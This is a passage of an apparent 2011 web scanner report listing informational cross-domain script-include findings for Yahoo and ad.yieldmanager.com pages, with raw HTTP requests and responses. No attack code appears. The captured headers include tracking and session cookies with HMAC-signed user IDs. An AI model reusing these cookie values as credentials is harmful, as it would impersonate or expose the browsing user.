4,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3D.mJTO0PDlB%255fpARpjTl.wjQAqMhd7ak5mFbgADqhS%26_salt%3D1652832779%26cb%3D1315313081109312%26i%3D140509%26r%3D0,02602a14-d886-11e0-8b21-78e7d161fe68 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS&ad_type=iframe&ad_size=728x90&site=140509&section_code=14445127&cb=1315313081109312&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15j13o5q5/M=787833.14445127.14291894.22/D=sports/S=2022092242:N/_ylt=Aq9E8pK_YqzvgGRT6l1fMpDSrYZ4/Y=YAHOO/EXP=1315320281/L=.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS/B=0F2xPtj8elw-/J=1315313081109312/K=dHuXEgTLQ4cGOnShgI49sw/A=6261245/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!%!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!,Y+@!$[S0!2reF!''w-!!!!$!?5%!'jyc4!i=9S!!J0T!(>n0~~~~~~=3]gE=3gdJM.jTN!#101!,Y+@!$XwL!1n,b!#t3o~!!ZH)'jyc6!w1K*!!J0T!$!$U!$]7n~~~~~=3]ih~~"; ih="b!!!!)!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!%=3]ih!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE!3Eo4!!!!#=3f.'"; vuday1=4M6Eq!79C835n]5; liday1=*YKlx!79C85[p%3; bh="b!!!#E!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!3:c!!!!#=3f8T!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4dM!!!!#=3]fh!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!#=3]fx!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:52 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: liday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0013.rm.sp2
Set-Cookie: ih="b!!!!*!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!%=3]ih!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE!3Eo4!!!!#=3f.'!4ZV5!!!!$=3f8^"; path=/; expires=Thu, 05-Sep-2013 12:44:52 GMT
Set-Cookie: bh="b!!!#F!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!3:c!!!!#=3f8T!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4dM!!!!#=3]fh!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!#=3]fx!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!$=3f8^!$?i5!!!!%=3`c_"; path=/; expires=Thu, 05-Sep-2013 12:44:52 GMT
Set-Cookie: vuday1=BgvR*4M6Eq!79C8M#n45; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!'!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!,Y+@!$[S0!2reF!''w-!!!!$!?5%!'jyc4!i=9S!!J0T!(>n0~~~~~~=3]gE=3gdJM.jTN!#101!,Y+@!$XwL!1n,b!#t3o~!!ZH)'jyc6!w1K*!!J0T!$!$U!$]7n~~~~~=3]ih~~!$?74!!E)(!$Xwe!4ZV5!'@G9!!!!$!?5%!$To(.!wVd.!%4=*!$#x5!(^vn~~~~~=3f8^=4'1X!!!#G"; path=/; expires=Thu, 05-Sep-2013 12:44:52 GMT
Set-Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: uid=uid=0437c6f8-d886-11e0-ae4a-78e7d15f7c8c&_hmacv=1&_salt=1842979857&_keyid=k1&_hmac=a0feea0b76b539d7f6f3647d41d7513f336eb436; path=/; expires=Thu, 06-Oct-2011 12:44:52 GMT
Set-Cookie: lifb=M5Jkn#DZT*WZK^n; path=/; expires=Tue, 06-Sep-2011 16:44:52 GMT
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:44:52 GMT
Pragma: no-cache
Content-Length: 1242
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10834543);}
</script><script type="text/javascript" src="http://tags.mathtag.com/view/js/?strat=109185&cr=126413&supply=99&random=1315313092&rfr=http%3A%2F%2Fsports%2Eyahoo%2Ecom%2Fnfl%2Fblog%2Fshutdown%5Fcorner%2Fpost%2Ftiki%2Dbarber%2Dremains%2Dunemployed%2Dand%2Dsad%3Furn%3Dnfl%2Dwp6443&rfid=238940&ymct=http%3A%2F%2Fads%2Ebluelithium%2Ecom%2Fclk%3F3%2CeAGVUMtuo0AQ%2EJk9rQzDPMAQa7QaG79iE7ABxfhiAUPAmDc42Pv164RstNftQ3d1taqkLognWhD4PJQkJZK5HATKBGKEo1CWNMRH0mQyUTSECJaJOjpsXJ2ZZ3fJpu9u7bLP2rzyzYAYiz%2DAN2yW%2DjH1mbmbrz55xjrLtYfjjFnpl34g%2ErPr%2EJmtvzSP2Q9wuysWVrqefpvp7P6SsrvnzKXt646YutcZziIzZhLx0vVt64Tk6PCL4Xi3Y%2D4i81vI6CjpuuoJgDgrAz8T%2EYaLdz8pSzEsc2CvlxTKKcSlXMvAoGN1rGIsQkKIDNH4AZAGVY2ICAGdtlXZdC2wKZIQesSKCHp6Aad71lFWa3O12py8%2Dvd7vNw7SgbfjEq3G%2D9IgEc9tjJNMD9YFGIo44dehWBLxfzZMSVLz6aniu2r1MnEPt2x2kj42L%2EI%2DSKImV4nNphSaYFuVpeqUdYL4HmwgVhSIZQ0DBHYUL66Huaxs92RcGkWdhKvidb2gFEFKRARGeypBH7%2D%2DJvH8Mw%2EWRRvGQiyMgZtcu142RensGyKqAFV2XagO1%2EOQuA3QdQITZT756IVrkWUV1l5j7jgF1xoff7r2hT0YST0lUII%2EgN86sV0%2C"></script>
...[SNIP]...

16.10. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /iframe3?XKUDAOiUGABiUZgAAAAAAAnhJQAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAXLsgAAAAAABfoTEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAFK5H4XoUBkAUrkfhehQGQBSuR-F6FAZAFK5H4XoUBkAUrkfhehQGQBSuR-F6FAZAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC-1vKFRPquCrnRbevBKa2aOyXC53U8C3Yzkg4BAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15jnbi3cd%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320284%2FL%3DF8DhwmKIPE7pARpjTl.wjQIRMhd7ak5mFbwADIEZ%2FB%3DFBSePtj8fcY-%2FJ%3D1315313084968840%2FK%3DtHb_lv57MAgihszSpmJhkw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3DF8DhwmKIPE7pARpjTl.wjQIRMhd7ak5mFbwADIEZ%26_salt%3D2271271428%26cb%3D1315313084968840%26i%3D140509%26r%3D0,04162e62-d886-11e0-b0bb-78e7d1fa057c HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=F8DhwmKIPE7pARpjTl.wjQIRMhd7ak5mFbwADIEZ&ad_type=iframe&ad_size=728x90&site=140509&section_code=14445127&cb=1315313084968840&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15jnbi3cd/M=787833.14445127.14291894.22/D=sports/S=2022092242:N/_ylt=Aq9E8pK_YqzvgGRT6l1fMpDSrYZ4/Y=YAHOO/EXP=1315320284/L=F8DhwmKIPE7pARpjTl.wjQIRMhd7ak5mFbwADIEZ/B=FBSePtj8fcY-/J=1315313084968840/K=tHb_lv57MAgihszSpmJhkw/A=6261245/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; bh="b!!!#F!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!3:c!!!!#=3f8T!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4dM!!!!#=3]fh!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!#=3]fx!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!#=3f8^!
$?i5!!!!%=3`c_"; ih="b!!!!*!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!'=3f8_!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE!3Eo4!!!!#=3f.'!4ZV5!!!!#=3f8^"; vuday1=BgvR*4M6Eq!79C8M#n45; pv1="b!!!!'!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!,Y+@!$[S0!2reF!''w-!!!!$!?5%!'jyc4!i=9S!!J0T!(>n0~~~~~~=3]gE=3gdJM.jTN!#101!!E)(!$XwW!1n,b!#t3o~!#Ds0$To(1!w1K*!%4=*!#!8+!$]7n~~~~~=3f8_~~!$?74!!E)(!$Xwe!4ZV5!'@G9!!!!$!?5%!$To(.!wVd.!%4=*!$#x5!(^vn~~~~~=3f8^=4'1X!!!#G"; liday1=*YKlx8SkUq!79C8gM+s%; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:55 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0192.rm.sp2
Set-Cookie: ih="b!!!!+!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!4=3f8a!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE!38Yq!!!!#=3f8a!3Eo4!!!!#=3f.'!4ZV5!!!!$=3f8_"; path=/; expires=Thu, 05-Sep-2013 12:44:55 GMT
Set-Cookie: vuday1=BgvR5!79C8'$[q]; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Set-Cookie: lifb=BcN3V!yANGM5Jkn$AVp-2AQ4:; path=/; expires=Tue, 06-Sep-2011 16:44:55 GMT
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:44:55 GMT
Pragma: no-cache
Content-Length: 2706
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(9982306);}
</script><IFRAME SRC="htt
...[SNIP]...
0&crID=126548&pubICode=2145116&pub=24284&partnerID=77&redirectURL=;ord=1315313095?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N3220.aod-invite.comOX15921/B5642080.11;abr=!ie;sz=728x90;pc=[TPAS_ID];click=http://t.invitemedia.com/track_click?auctionID=13153130951610984-126548&campID=106300&crID=126548&pubICode=2145116&pub=24284&partnerID=77&redirectURL=;ord=1315313095?">
</SCRIPT>
...[SNIP]...

16.11. http://autos.yahoo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://autos.yahoo.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: autos.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223; adxid=016e3b4e6615bdb5

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:50 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Cache-Control: private
Age: 3
Server: YTS/1.19.5
Proxy-Connection: keep-alive
Content-Length: 145087

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US">
<head>
<meta http-equiv="Content-Type" conten
...[SNIP]...
lobal-min-43868.css&pc/autos/p/mmt/mmt_global-min-42230.css&pc/autos/p/common/autos_nav-min-44107.css&pc/autos/p/homepage/homepage-min-44216.css&pc/autos/p/common/autos_global-delta_2011-07-22.css" />
<script type="text/javascript" src="http://l.yimg.com/zz/combo?yui:3.1.1/build/yui/yui.js"></script>
...[SNIP]...
</script><script charset='utf-8' type='text/javascript' src='http://l.yimg.com/zz/combo?kx/ucs/common/js/1/setup-min.js&kx/ucs/sts/js/83/skip-min.js&kx/ucs/menu_utils/js/134/menu_utils-min.js&kx/ucs/username/js/33/user_menu-min.js&kx/ucs/help/js/35/help_menu-min.js&kx/ucs/utility_link/js/15/utility_menu-min.js&kx/ucs/common/js/127/logo_debug-min.js&kx/ucs/homepage/js/124/homepage-min.js&kx/ucs/search/js/179/search-min.js'></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved --><script type="text/javascript"src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved --><script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://l.yimg.com/zz/combo?d/lib/yui/2.8.0r4/build/yahoo/yahoo-min.js&d/lib/yui/2.8.0r4/build/get/get-min.js&d/lib/yui/2.8.0r4/build/dom/dom-min.js&d/lib/yui/2.8.0r4/build/selector/selector-min.js&d/lib/yui/2.8.0r4/build/event/event-min.js&d/lib/yui/2.8.0r4/build/element/element-min.js&d/lib/yui/2.8.0r4/build/button/button.js&d/lib/yui/2.8.0r4/build/connection/connection-min.js&d/lib/yui/2.8.0r4/build/json/json-min.js&d/lib/yui/2.8.0r4/build/container/container-min.js&d/lib/yui/2.8.0r4/build/animation/animation-min.js&d/lib/yui/2.8.0r4/build/imageloader/imageloader-min.js&d/lib/ult/strip_1.12.js&pc/autos/p/common/autos_global-min-44130.js&pc/autos/p/mmt/autos_mmt_global-min-41705.js&pc/autos/p/common/autos_mvc-min-41705.js&pc/autos/p/common/autos_tabview-min-42088.js&d/lib/yat/yep/player_20100605.js&pc/autos/p/common/autos_video-min-41705.js&pc/autos/p/homepage/homepage-min-43199.js&pc/autos/p/mmt/autos_carousel-min-41705.js&pc/autos/p/homepage/userpickscarousel-min-43575.js&d/lib/darla/fc_0.2.9.js&d/lib/darla/util_0.2.6.js&d/lib/darla/renderers/complex_renderer_0.3.0.js"></script>
...[SNIP]...

16.12. http://autos.yahoo.com/bentley/continental-gtc/2011/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://autos.yahoo.com
Path:   /bentley/continental-gtc/2011/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /bentley/continental-gtc/2011/ HTTP/1.1
Host: autos.yahoo.com
Proxy-Connection: keep-alive
Referer: http://autos.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
